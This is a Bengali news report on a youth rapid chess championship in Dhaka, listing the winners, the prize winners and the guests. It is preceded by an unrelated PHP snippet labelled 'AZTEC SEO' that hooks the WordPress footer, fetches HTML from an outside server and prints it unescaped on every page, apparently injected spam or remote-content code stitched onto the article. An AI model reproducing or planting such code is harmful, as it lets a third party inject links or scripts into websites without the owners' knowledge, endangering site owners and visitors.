/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
বাংলাদেশ দাবা ফেডারেশনের সহযোগিতায় ও শেখ রাসেল চেস একাডেমির আয়োজনে প্রথম শেখ রাসেল ইয়ুথ র্যাপিড দাবা চ্যাম্পিয়নশিপ-২০২৩ এ স্বর্নাভো চৌধুরী অপরাজিত চ্যাম্পিয়ন হওয়ার গৌরব অর্জন করেছেন। স্বর্নাভো ৭ খেলায় সাড়ে ছয় পয়েন্ট পেয়ে শিরেপা জয় করেন।
ছয় পয়েন্ট করে নিয়ে টাইব্রেকিংয়ে ফিদে মাস্টার তাহসিন তাজওয়ার জিয়া রানার-আপ, মহিলা ক্যান্ডিডেট মাস্টার আহমেদ ওয়ালিজা তৃতীয় ও মোঃ আজমাইন পারভেজ সায়র চতুর্থ স্থান লাভ করেন।
সাড়ে পাঁচ পয়েন্ট করে নিয়ে মোঃ সাজিদুল হক পঞ্চম, ওয়ারসিয়া খুশবু ষষ্ঠ ও সাফায়াত কিবরিয়া আযান সপ্তম স্থান লাভ করেন। পাঁচ পয়েন্ট নিয়ে টাইব্রেকিংয়ে অষ্টম হন তাহমিদুল হক।

বিশেষ পুরস্কার লাভ করেন যথাক্রমে : অনুর্ধ্ব-১৪ আহনাফ রশিদ চৌধুরী, অনুর্ধ্ব-১২ আয়ান রহমান, অনুর্ধ্ব-১০ ওয়ারিসা হায়দার এবং বালিকা- ওয়াদিফা আহমেদ।
৬ জানুয়ারি শুক্রবার সকাল হতে দিন ব্যাপী এ র্যাপিড দাবায় অনুর্ধ্ব-২০ বছর বয়সী দাবা ৯৬ জন খেলোয়াড় অংশগ্রহণ করেন। প্রতিযোগিতার খেলা শেষে সন্ধ্যায় পুরস্কার বিতরণী অনুষ্ঠিত হয়।
শেখ রাসেল জাতীয় শিশু কিশোর পরিষদের মহাসচিব ও বাংলাদেশ দাবা ফেডারেশনের সহ সভাপতি কে এম শহিদউল্যা প্রধান অতিথি হিসেবে উপস্থিত থেকে বিজয়ীদের মধ্যে পুরস্কার বিতরণ করেন।
বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন বাংলাদেশ দাবা ফেডারেশনের সাধারণ সম্পাদক ও বিশ্ব দাবা সংস্থার জোন ৩.২ এর প্রেসিডেন্ট সৈয়দ শাহাব উদ্দিন শামীম, ঢাকা দক্ষিণ সিটি কর্পোরেশনের ১ নং ওয়ার্ডের (খিলগাঁও) কাউন্সিলর মাহবুবুল আলম, বাংলাদেশ দাবা ফেডারেশনের কার্যনির্বাহী কমিটির সদস্য আন্তর্জাতিক অর্গানাইজার মাহমুদা হক চৌধুরী মলি ও শেখ রাসেল চেস একাডেমির উপদেষ্টা মোঃ একরাম মাসুদ।
প্রতিযোগিতার খেলা ৭ রাউন্ড সুইস-লিগ পদ্ধতিতে অনুষ্ঠিত হয় এবং বিজয়ীদের বিশ হাজার টাকা অর্থ পুরস্কার দেয়া হয়।